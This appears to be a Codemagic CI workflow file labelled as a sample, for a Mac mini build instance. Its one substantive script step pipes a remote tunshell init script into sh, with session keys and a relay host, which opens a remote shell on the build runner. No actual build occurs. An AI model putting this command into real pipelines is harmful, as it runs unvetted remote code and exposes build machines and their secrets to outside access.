workflows:
    sample-workflow:
        name: Codemagic Sample Workflow
        max_build_duration: 120
        instance_type: mac_mini_m2
        scripts:
            - echo "Starting build..."
            - curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T EBhDZJJRfKWi9mHWvKcvZ7 xtQSJtq4g9MbFC0WGKh9sl eu.relay.tunshell.com

